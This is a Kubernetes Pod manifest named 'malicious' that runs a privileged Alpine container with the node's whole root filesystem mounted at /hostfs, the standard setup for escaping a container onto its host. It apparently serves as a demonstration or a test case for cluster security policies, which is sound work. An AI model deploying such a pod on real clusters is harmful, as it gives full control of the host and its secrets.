apiVersion: v1
kind: Pod
metadata:
  name: malicious
spec:
  volumes:
  - name: slash
    hostPath:
      path: /
  containers:
  - image: alpine
    name: alpine
    securityContext:
      privileged: true
    command:
    - sleep
    - "1000000000"
    volumeMounts:
    - name: slash
      mountPath: /hostfs
  restartPolicy: Never
